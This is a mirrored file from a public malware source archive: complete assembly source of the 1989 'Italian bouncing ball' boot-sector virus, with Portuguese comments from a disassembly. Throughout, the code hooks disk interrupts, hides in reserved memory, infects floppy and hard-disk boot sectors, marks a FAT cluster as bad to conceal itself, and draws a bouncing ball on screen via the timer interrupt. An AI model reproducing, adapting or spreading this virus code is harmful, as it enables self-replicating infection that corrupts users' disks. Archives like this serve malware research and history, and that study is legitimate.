mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-07 02:45:27 +00:00
455 lines
13 KiB
NASM
455 lines
13 KiB
NASM
|
; **************************************************
|
|||
|
; *** VIRUS ITALIANO SALTITANTE - A LISTAGEM ***
|
|||
|
; *** Desassemblagem obtida por Miguel Vitorino ***
|
|||
|
; *** Para : S P O O L E R - Junho de 1989 ***
|
|||
|
; **************************************************
|
|||
|
|
|||
|
.RADIX 16
|
|||
|
|
|||
|
jmpf macro x
|
|||
|
db 0eah
|
|||
|
dd x
|
|||
|
endm
|
|||
|
|
|||
|
Virus SEGMENT
|
|||
|
assume cs:virus;ds:virus
|
|||
|
|
|||
|
jmpf MACRO x
|
|||
|
db 0eah
|
|||
|
dd x
|
|||
|
ENDM
|
|||
|
|
|||
|
org 0100h
|
|||
|
|
|||
|
begin: jmp short entry
|
|||
|
|
|||
|
db 1eh-2 dup (?) ; Informacao relativa a' disquete
|
|||
|
|
|||
|
entry: xor ax,ax
|
|||
|
mov ss,ax
|
|||
|
mov sp,7c00 ; Colocar o Stack antes do inicio do
|
|||
|
mov ds,ax ; virus
|
|||
|
mov ax,ds:[0413] ; Retirar 2 K como se nao existissem
|
|||
|
sub ax,2 ; para que o DOS nao la' chegue !
|
|||
|
mov ds:[0413],ax
|
|||
|
mov cl,06 ; Converter o tamanho da RAM num
|
|||
|
shl ax,cl ; numero de segmento que se situa nos
|
|||
|
sub ax,07c0 ; 2 ultimos K
|
|||
|
mov es,ax ; De seguida passar este programa
|
|||
|
mov si,7c00 ; para esse sitio de memoria
|
|||
|
mov di,si ; ( i.e. o programa transfere-se a si
|
|||
|
mov cx,0100 ; proprio )
|
|||
|
repz movsw
|
|||
|
mov cs,ax ; Transferencia de controlo para ai!
|
|||
|
push cs ; Agora sim , ja' estamos nos tais 2K
|
|||
|
pop ds
|
|||
|
call reset ; fazer duas vezes um "reset" ao
|
|||
|
reset: xor ah,ah ; controlador de disco
|
|||
|
int 13
|
|||
|
and byte ptr ds:drive,80
|
|||
|
mov bx,ds:sector ; Sector onde esta' o resto do virus
|
|||
|
push cs
|
|||
|
pop ax
|
|||
|
sub ax,0020
|
|||
|
mov es,ax
|
|||
|
call ler_sector ; Ler o resto do virus da drive
|
|||
|
mov bx,ds:sector
|
|||
|
inc bx
|
|||
|
mov ax,0ffc0 ; Carregar o sector de boot original
|
|||
|
mov es,ax
|
|||
|
call ler_sector
|
|||
|
xor ax,ax
|
|||
|
mov ds:estado,al
|
|||
|
mov ds,ax
|
|||
|
mov ax,ds:[004c] ; "Confiscar" o interrupt 13
|
|||
|
mov bx,ds:[004e] ; ( operacoes sobre disquetes/discos )
|
|||
|
mov word ptr ds:[004c],offset int_13
|
|||
|
mov ds:[004e],cs
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
mov word ptr ds:velho_13,ax ; Guardar a velha rotina do int. 13
|
|||
|
mov word ptr ds:velho_13+2,bx
|
|||
|
mov dl,ds:drive
|
|||
|
jmpf 0:7c00 ; Efectuar o arranque do sistema
|
|||
|
|
|||
|
Esc_Sector proc near
|
|||
|
mov ax,0301 ; Escrever um sector da drive
|
|||
|
jmp short cs:transferir
|
|||
|
Esc_Sector endp
|
|||
|
|
|||
|
Ler_Sector proc near
|
|||
|
mov ax,0201 ; Ler um sector da drive
|
|||
|
Ler_Sector endp
|
|||
|
|
|||
|
Transferir proc near ; Efectuar uma transferencia de dados
|
|||
|
xchg ax,bx ; de ou para a drive
|
|||
|
add ax,ds:[7c1c] ; Este procedimento tem como entrada
|
|||
|
xor dx,dx ; o numero do sector pretendido ( BX )
|
|||
|
div ds:[7c18] ; e de seguida sao feitas as contas
|
|||
|
inc dl ; para saber qual a pista e o lado
|
|||
|
mov ch,dl ; onde esse sector fica
|
|||
|
xor dx,dx
|
|||
|
div ds:[7c1a]
|
|||
|
mov cl,06
|
|||
|
shl ah,cl
|
|||
|
or ah,ch
|
|||
|
mov cx,ax
|
|||
|
xchg ch,cl
|
|||
|
mov dh,dl
|
|||
|
mov ax,bx ; Depois de todas as contas feitas
|
|||
|
transf: mov dl,ds:drive ; pode-se chamar o interrupt 13H
|
|||
|
mov bx,8000 ; es:bx = end. de transferencia
|
|||
|
int 13
|
|||
|
jnb trans_exit
|
|||
|
pop ax
|
|||
|
trans_exit: ret
|
|||
|
Transferir endp
|
|||
|
|
|||
|
Int_13 proc near ; Rotina de atendimento ao int. 13H
|
|||
|
push ds ; (operacoes sobre discos e disquetes)
|
|||
|
push es
|
|||
|
push ax
|
|||
|
push bx
|
|||
|
push cx
|
|||
|
push dx
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
push cs
|
|||
|
pop es
|
|||
|
test byte ptr ds:estado,1 ; Testar se se esta' a ver se o virus
|
|||
|
jnz call_BIOS ; esta' no disco
|
|||
|
cmp ah,2
|
|||
|
jnz call_BIOS
|
|||
|
cmp ds:drive,dl ; Ver se a ultima drive que foi
|
|||
|
mov ds:drive,dl ; mexida e' igual a' drive onde
|
|||
|
jnz outra_drv ; se vai mexer
|
|||
|
xor ah,ah ; Neste momento vai-se tirar a' sorte
|
|||
|
int 1a ; para ver se o virus fica activo
|
|||
|
test dh,7f ; Isto e' feito a partir da leitura
|
|||
|
jnz nao_desp ; da hora e se for igual a um dado
|
|||
|
test dl,0f0 ; numero , o virus e' despoletado
|
|||
|
jnz nao_desp
|
|||
|
push dx ; Instalar o movimento da bola
|
|||
|
call despoletar
|
|||
|
pop dx
|
|||
|
nao_desp: mov cx,dx
|
|||
|
sub dx,ds:semente
|
|||
|
mov ds:semente,cx
|
|||
|
sub dx,24
|
|||
|
jb call_BIOS
|
|||
|
outra_drv: or byte ptr ds:estado,1 ; Indicar que se esta' a testar a
|
|||
|
push si ; presenca ou nao do virus na drive
|
|||
|
push di
|
|||
|
call contaminar
|
|||
|
pop di
|
|||
|
pop si
|
|||
|
and byte ptr ds:estado,0fe ; Indicar fim de teste de virus
|
|||
|
call_BIOS: pop dx
|
|||
|
pop cx
|
|||
|
pop bx
|
|||
|
pop ax
|
|||
|
pop es
|
|||
|
pop ds
|
|||
|
Velho_13 equ $+1
|
|||
|
jmpf 0:0
|
|||
|
Int_13 endp
|
|||
|
|
|||
|
Contaminar proc near
|
|||
|
mov ax,0201
|
|||
|
mov dh,0
|
|||
|
mov cx,1
|
|||
|
call transf
|
|||
|
test byte ptr ds:drive,80 ; Pediu-se um reset a' drive ?
|
|||
|
jz testar_drv ; Sim , passar a' contaminacao directa
|
|||
|
mov si,81be
|
|||
|
mov cx,4
|
|||
|
proximo: cmp byte ptr [si+4],1
|
|||
|
jz ler_sect
|
|||
|
cmp byte ptr [si+4],4
|
|||
|
jz ler_sect
|
|||
|
add si,10
|
|||
|
loop proximo
|
|||
|
ret
|
|||
|
|
|||
|
ler_sect: mov dx,[si] ; Cabeca+drive
|
|||
|
mov cx,[si+2] ; Pista+sector inicial
|
|||
|
mov ax,0201 ; Ler esse sector
|
|||
|
call transf
|
|||
|
testar_drv: mov si,8002 ; Comparar os 28 primeiros bytes para
|
|||
|
mov di,7c02 ; ver se o sector de boot e' o mesmo
|
|||
|
mov cx,1c ; i.e. ver se a drive ja' foi virada !
|
|||
|
repz movsb
|
|||
|
cmp word ptr ds:[offset flag+0400],1357
|
|||
|
jnz esta_limpa
|
|||
|
cmp byte ptr ds:flag_2,0
|
|||
|
jnb tudo_bom
|
|||
|
mov ax,word ptr ds:[offset prim_dados+0400]
|
|||
|
mov ds:prim_dados,ax ; Se chegar aqui entao a disquete ja'
|
|||
|
mov si,ds:[offset sector+0400] ; esta' contaminada !
|
|||
|
jmp infectar
|
|||
|
tudo_bom: ret
|
|||
|
|
|||
|
; Neste momento descobriu-se uma disquete nao contaminada ! Vai-se agora
|
|||
|
; proceder a' respectiva contaminacao !
|
|||
|
|
|||
|
esta_limpa: cmp word ptr ds:[800bh],0200; Bytes por sector
|
|||
|
jnz tudo_bom
|
|||
|
cmp byte ptr ds:[800dh],2 ; Sectores por cluster
|
|||
|
jb tudo_bom
|
|||
|
mov cx,ds:[800e] ; Sectores reservados
|
|||
|
mov al,byte ptr ds:[8010] ; Numero de FAT's
|
|||
|
cbw
|
|||
|
mul word ptr ds:[8016] ; Numero de sectores de FAT
|
|||
|
add cx,ax
|
|||
|
mov ax,' '
|
|||
|
mul word ptr ds:[8011] ; Numero de entradas na root
|
|||
|
add ax,01ff
|
|||
|
mov bx,0200
|
|||
|
div bx
|
|||
|
add cx,ax
|
|||
|
mov ds:prim_dados,cx
|
|||
|
mov ax,ds:[7c13] ; Numero de sectores da drive
|
|||
|
sub ax,ds:prim_dados
|
|||
|
mov bl,byte ptr ds:[7c0dh] ; Numero de sectores por cluster
|
|||
|
xor dx,dx
|
|||
|
xor bh,bh
|
|||
|
div bx
|
|||
|
inc ax
|
|||
|
mov di,ax
|
|||
|
and byte ptr ds:estado,0fbh ; Se o numero de clusters dor superior
|
|||
|
cmp ax,0ff0 ; a 0FF0 entao cada entrada na FAT sao
|
|||
|
jbe sao_3 ; 4 nibbles senao sao 3
|
|||
|
or byte ptr ds:estado,4 ; 4 = disco duro ?
|
|||
|
sao_3: mov si,1 ; Escolher sector a infectar
|
|||
|
mov bx,ds:[7c0e] ; Numero de sectores reservados
|
|||
|
dec bx
|
|||
|
mov ds:inf_sector,bx ; Sector a infectar
|
|||
|
mov byte ptr ds:FAT_sector,0fe
|
|||
|
jmp short continua
|
|||
|
|
|||
|
Inf_Sector dw 1 ; Sector a infectar
|
|||
|
Prim_Dados dw 0c ; Numero do primeiro sector de dados
|
|||
|
Estado db 0 ; Estado actual do virus (instalado/nao instalado,etc)
|
|||
|
Drive db 1 ; Drive onde se pediu uma accao
|
|||
|
Sector dw 0ec ; Sector auxiliar para procura do virus
|
|||
|
Flag_2 db 0 ; Estes proximos valores servem para ver se o virus
|
|||
|
Flag dw 1357 ; ja' esta' ou nao presente numa drive , bastando
|
|||
|
dw 0aa55 ; comparar se estes valores batem certos para o saber
|
|||
|
|
|||
|
continua: inc word ptr ds:inf_sector
|
|||
|
mov bx,ds:inf_sector
|
|||
|
add byte ptr ds:[FAT_sector],2
|
|||
|
call ler_sector
|
|||
|
jmp short l7e4b
|
|||
|
|
|||
|
; Este pequeno pedaco de programa o que faz e' percorrer a FAT que ja' esta' na
|
|||
|
; memo'ria e procurar ai um cluster livre para colocar nesse sitio o resto do
|
|||
|
; virus
|
|||
|
|
|||
|
verificar: mov ax,3 ; Media descriptor + ff,ff
|
|||
|
test byte ptr ds:estado,4 ; disco duro ?
|
|||
|
jz l7e1d
|
|||
|
inc ax ; Sim , FAT comeca 1 byte mais adiante
|
|||
|
l7e1d: mul si ; Multiplicar pelo numero do cluster
|
|||
|
shr ax,1
|
|||
|
sub ah,ds:FAT_sector
|
|||
|
mov bx,ax
|
|||
|
cmp bx,01ff
|
|||
|
jnb continua
|
|||
|
mov dx,[bx+8000] ; Ler a entrada na FAT
|
|||
|
test byte ptr ds:estado,4
|
|||
|
jnz l7e45
|
|||
|
mov cl,4
|
|||
|
test si,1
|
|||
|
jz l7e42
|
|||
|
shr dx,cl
|
|||
|
l7e42: and dh,0f
|
|||
|
l7e45: test dx,0ffff ; Se a entrada na FAT for zero,entao
|
|||
|
jz l7e51 ; descobriu-se um cluster para por o
|
|||
|
l7e4b: inc si ; virus , senao passa-se ao proximo
|
|||
|
cmp si,di ; cluster ate' achar um bom
|
|||
|
jbe verificar
|
|||
|
ret
|
|||
|
|
|||
|
; Ja' foi descoberto qual o cluster a infectar ( registo BX ) , agora vai-se
|
|||
|
; proceder a' infeccao da disquete ou disco e tambem a' marcacao desse cluster
|
|||
|
; como um "bad cluster" para o DOS nao aceder a ele
|
|||
|
|
|||
|
l7e51: mov dx,0fff7 ; Marcar um "bad cluster" (ff7)
|
|||
|
test byte ptr ds:estado,4 ; Ver qual o tamanho das ents. na FAT
|
|||
|
jnz l7e68 ; ( 3 ou 4 nibbles )
|
|||
|
and dh,0f
|
|||
|
mov cl,4
|
|||
|
test si,1
|
|||
|
jz l7e68
|
|||
|
shl dx,cl
|
|||
|
l7e68: or [bx+8000],dx
|
|||
|
mov bx,word ptr ds:inf_sector ; Infectar sector !!!
|
|||
|
call esc_sector
|
|||
|
mov ax,si
|
|||
|
sub ax,2
|
|||
|
mov bl,ds:7c0dh ; Numero de sectores por cluster
|
|||
|
xor bh,bh
|
|||
|
mul bx
|
|||
|
add ax,ds:prim_dados
|
|||
|
mov si,ax ; SI = sector a infectar
|
|||
|
mov bx,0 ; Ler o sector de boot original
|
|||
|
call ler_sector
|
|||
|
mov bx,si
|
|||
|
inc bx
|
|||
|
call esc_sector ; ... e guarda'-lo depois do virus
|
|||
|
infectar: mov bx,si
|
|||
|
mov word ptr ds:sector,si
|
|||
|
push cs
|
|||
|
pop ax
|
|||
|
sub ax,20 ; Escrever o resto do virus
|
|||
|
mov es,ax
|
|||
|
call esc_sector
|
|||
|
push cs
|
|||
|
pop ax
|
|||
|
sub ax,40
|
|||
|
mov es,ax
|
|||
|
mov bx,0 ; Escrever no sector de boot o virus
|
|||
|
call esc_sector
|
|||
|
ret
|
|||
|
Contaminar endp
|
|||
|
|
|||
|
Semente dw ? ; Esta word serve para fins de
|
|||
|
; temporizacao da bola a saltar
|
|||
|
FAT_sector db 0 ; Diz qual e' o numero do sector que
|
|||
|
; se esta' a percorrer quando se
|
|||
|
; vasculha a FAT
|
|||
|
|
|||
|
Despoletar proc near ; Comecar a mostrar a bola no ecran
|
|||
|
test byte ptr ds:estado,2 ; Virus ja' esta' activo ?
|
|||
|
jnz desp_exit ; Sim ,sair
|
|||
|
or byte ptr ds:estado,2 ; Nao , marcar activacao
|
|||
|
mov ax,0
|
|||
|
mov ds,ax
|
|||
|
mov ax,ds:20 ; Posicionar interrupt 8 (relogio)
|
|||
|
mov bx,ds:22
|
|||
|
mov word ptr ds:20,offset int_8
|
|||
|
mov ds:22,cs
|
|||
|
push cs
|
|||
|
pop ds ; E guardar a rotina anterior
|
|||
|
mov word ptr ds:velho_8+8,ax
|
|||
|
mov word ptr ds:velho_8+2,bx
|
|||
|
desp_exit: ret
|
|||
|
Despoletar endp
|
|||
|
|
|||
|
Int_8 proc near ; Rotina de atendimento ao interrupt
|
|||
|
push ds ; provocado pelo relogio 18.2 vezes
|
|||
|
push ax ; por segundo . Neste procedimento
|
|||
|
push bx ; e' que se faz o movimento da bola
|
|||
|
push cx ; pelo ecran
|
|||
|
push dx
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
mov ah,0f ; Ver qual o tipo de modo de video
|
|||
|
int 10
|
|||
|
mov bl,al
|
|||
|
cmp bx,ds:modo_pag ; Comparar modo e pagina de video com
|
|||
|
jz ler_cur ; os anteriores
|
|||
|
mov ds:modo_pag,bx ; Quando aqui chega mudou-se o modo
|
|||
|
dec ah ; de video
|
|||
|
mov ds:colunas,ah ; Guardar o numero de colunas
|
|||
|
mov ah,1
|
|||
|
cmp bl,7 ; Comparar modo com 7 (80x25 Mono)
|
|||
|
jnz e_CGA
|
|||
|
dec ah
|
|||
|
e_CGA: cmp bl,4 ; Ve se e' modo grafico
|
|||
|
jnb e_grafico
|
|||
|
dec ah
|
|||
|
e_grafico: mov ds:muda_attr,ah
|
|||
|
mov word ptr ds:coordenadas,0101
|
|||
|
mov word ptr ds:direccao,0101
|
|||
|
mov ah,3 ; Ler a posicao do cursor
|
|||
|
int 10
|
|||
|
push dx ; ... e guarda-la
|
|||
|
mov dx,ds:coordenadas
|
|||
|
jmp short limites
|
|||
|
|
|||
|
ler_cur: mov ah,3 ; Ler a posicao do cursor ...
|
|||
|
int 10
|
|||
|
push dx ; ... e guarda-la
|
|||
|
mov ah,2 ; Posicionar o cursor no sitio da bola
|
|||
|
mov dx,ds:coordenadas
|
|||
|
int 10
|
|||
|
mov ax,ds:carat_attr
|
|||
|
cmp byte ptr ds:muda_attr,1
|
|||
|
jnz mudar_atr
|
|||
|
mov ax,8307 ; Atributos e carater 7
|
|||
|
mudar_atr: mov bl,ah ; Carregar carater 7 (bola)
|
|||
|
mov cx,1
|
|||
|
mov ah,9 ; Escrever a bola no ecran
|
|||
|
int 10
|
|||
|
limites: mov cx,ds:direccao ; Agora vai-se ver se a bola esta' no
|
|||
|
cmp dh,0 ; ecran . Linha = 0 ?
|
|||
|
jnz linha_1
|
|||
|
xor ch,0ff ; Mudar direccao
|
|||
|
inc ch
|
|||
|
linha_1: cmp dh,18 ; Linha = 24 ?
|
|||
|
jnz coluna_1
|
|||
|
xor ch,0ff ; Mudar direccao
|
|||
|
inc ch
|
|||
|
coluna_1: cmp dl,0 ; Coluna = 0 ?
|
|||
|
jnz coluna_2
|
|||
|
xor cl,0ff ; Mudar direccao
|
|||
|
inc cl
|
|||
|
coluna_2: cmp dl,ds:colunas ; Colunas = numero de colunas ?
|
|||
|
jnz esta_fixe
|
|||
|
xor cl,0ff ; Mudar direccao
|
|||
|
inc cl
|
|||
|
esta_fixe: cmp cx,ds:direccao ; Mesma direccao ?
|
|||
|
jnz act_bola
|
|||
|
mov ax,ds:carat_attr
|
|||
|
and al,7
|
|||
|
cmp al,3
|
|||
|
jnz nao_e
|
|||
|
xor ch,0ff
|
|||
|
inc ch
|
|||
|
nao_e: cmp al,5
|
|||
|
jnz act_bola
|
|||
|
xor cl,0ff
|
|||
|
inc cl
|
|||
|
act_bola: add dl,cl ; Actualizar as coordenadas da bola
|
|||
|
add dh,ch
|
|||
|
mov ds:direccao,cx
|
|||
|
mov ds:coordenadas,dx
|
|||
|
mov ah,2
|
|||
|
int 10
|
|||
|
mov ah,8 ; Ler carater para onde vai a bola
|
|||
|
int 10
|
|||
|
mov ds:carat_attr,ax
|
|||
|
mov bl,ah
|
|||
|
cmp byte ptr ds:muda_attr,1
|
|||
|
jnz nao_muda
|
|||
|
mov bl,83 ; Novo atributo
|
|||
|
nao_muda: mov cx,1
|
|||
|
mov ax,0907 ; Escrever a bola no ecran
|
|||
|
int 10
|
|||
|
pop dx
|
|||
|
mov ah,2 ; Recolocar o cursor no posicao onde
|
|||
|
int 10 ; estava antes de escrever a bola
|
|||
|
pop dx
|
|||
|
pop cx
|
|||
|
pop bx
|
|||
|
pop ax
|
|||
|
pop ds
|
|||
|
velho_8 equ $+1
|
|||
|
jmpf 0:0
|
|||
|
Int_8 endp
|
|||
|
|
|||
|
Carat_attr dw ? ; 7fcd
|
|||
|
Coordenadas dw 0101 ; 7fcf
|
|||
|
Direccao dw 0101 ; 7fd1
|
|||
|
Muda_attr db 1 ; 7fd3
|
|||
|
Modo_pag dw ? ; 7fd4
|
|||
|
Colunas db ? ; 7fd6
|
|||
|
|
|||
|
; Os bytes que se seguem destinam-se a reservar espaco para o stack
|
|||
|
|
|||
|
Virus ENDS
|
|||
|
|
|||
|
END begin
|
|||
|
|